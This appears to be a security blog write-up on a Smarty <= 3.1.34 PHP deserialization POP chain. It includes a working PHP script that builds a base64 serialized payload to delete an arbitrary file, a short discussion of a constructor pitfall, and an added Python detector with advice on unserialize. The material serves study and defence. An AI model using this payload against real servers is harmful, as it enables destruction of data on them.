  • Smarty 3.1.34 deserialization POP chain (arbitrary file deletion)

    Smarty <= 3.1.34 contains a POP chain that leads to arbitrary file deletion.

    Exp:

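    <?php
    // Stub classes that reuse Smarty's class and property names so that
    // serialize() emits the object graph the chain needs.
    class Smarty_Internal_Template
    {
        public $smarty = null;
        // Declared explicitly: dynamic properties are deprecated since PHP 8.2.
        public $cached = null;
        public function __construct()
        {
            $this->smarty = new Smarty;
            $this->cached = new Smarty_Template_Cached;
        }
    }
    class Smarty
    {
        public $cache_locking = true;
    }
    class Smarty_Template_Cached
    {
        public $is_locked = true;
        public $handler = null;
        public $lock_id = null;
        public function __construct()
        {
            $this->handler = new Smarty_Internal_CacheResource_File;
            // Path of the file that gets deleted.
            $this->lock_id = './1.txt';
        }
    }
    class Smarty_Internal_CacheResource_File
    {
    }
    // Serialize the object graph and print it base64-encoded.
    $obj = base64_encode(serialize(new Smarty_Internal_Template));
    echo($obj);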
    

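    The process is fairly simple; I didn't run into any pitfalls.

    Reference article: https://xz.aliyun.com/t/6929

    At first I couldn't work out what the pitfall mentioned in the second reply to the original article was; it didn't seem to make sense.

    After reading the original author's exp carefully, I realized that the reply refers to a pitfall in the author's exp, not in the program's code:

    Using new always calls the __construct method, which re-initializes the $lock_id property that was set above and so discards its value.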
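
As an added example (not from the original post or from Smarty), the following Python check is one way a defender could screen request parameters, cookies or logged fields for serialized input that names the three classes used by the PoC above. The function names and the sample payload are constructed for illustration, and the regex match is a heuristic, not a full parser of PHP's serialization format.

```python
import base64
import binascii
import re

# Class names taken from the PoC on this page.
GADGET_CLASSES = {
    "Smarty_Internal_Template",
    "Smarty_Template_Cached",
    "Smarty_Internal_CacheResource_File",
}
# PHP serialized object header: O:<name length>:"<class>":<property count>:{
OBJECT_RE = re.compile(rb'O:(\d+):"([A-Za-z0-9_\\]+)":\d+:\{')
# The lock_id property followed by the header of its string value.
LOCK_ID_RE = re.compile(rb's:7:"lock_id";s:(\d+):"')

# Constructed sample: the object graph the PoC serializes, written out by hand.
SAMPLE = (
    b'O:24:"Smarty_Internal_Template":2:{s:6:"smarty";O:6:"Smarty":1:'
    b'{s:13:"cache_locking";b:1;}s:6:"cached";O:22:"Smarty_Template_Cached":3:'
    b'{s:9:"is_locked";b:1;s:7:"handler";O:34:"Smarty_Internal_CacheResource_File"'
    b':0:{}s:7:"lock_id";s:7:"./1.txt";}}'
)


def decode_candidate(value: str) -> bytes:
    """Base64-decode the value when it is strict base64, else use it as-is."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return value.encode("utf-8", "replace")


def inspect_payload(value: str) -> dict:
    """List serialized class names and flag the Smarty cache-lock chain."""
    data = decode_candidate(value)
    classes = [
        m.group(2).decode()
        for m in OBJECT_RE.finditer(data)
        if int(m.group(1)) == len(m.group(2))  # length prefix must match name
    ]
    lock_id = None
    m = LOCK_ID_RE.search(data)
    if m:
        lock_id = data[m.end():m.end() + int(m.group(1))].decode("utf-8", "replace")
    hits = sorted(GADGET_CLASSES.intersection(classes))
    # Alert only when all three chain classes and a lock_id value are present.
    alert = len(hits) == len(GADGET_CLASSES) and lock_id is not None
    return {"classes": classes, "gadget_hits": hits, "lock_id": lock_id, "alert": alert}
```

Calling `inspect_payload()` on a suspicious field returns the class names found, the `lock_id` path if present, and an `alert` flag. On the application side, passing `['allowed_classes' => false]` to PHP's `unserialize()` for untrusted input prevents these classes from being instantiated at all.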

  • Original article: https://www.cnblogs.com/xiaozhiru/p/12462402.html